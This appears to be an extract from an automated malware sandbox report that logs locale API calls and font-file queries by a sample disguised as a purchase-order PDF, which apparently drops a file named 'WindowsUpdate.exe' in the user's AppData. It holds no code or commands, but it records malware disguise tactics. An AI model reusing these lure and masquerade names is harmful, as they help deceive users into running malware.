              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00EF8450
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00F056EB
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00F059D7
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00F0596E
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: EnumSystemLocalesW,11_2_00F05A72
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00F05B00
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,11_2_00F05D50
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00F05E79
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,11_2_00F05F81
              Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: GetLocaleInfoW,11_2_00EF8F37
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
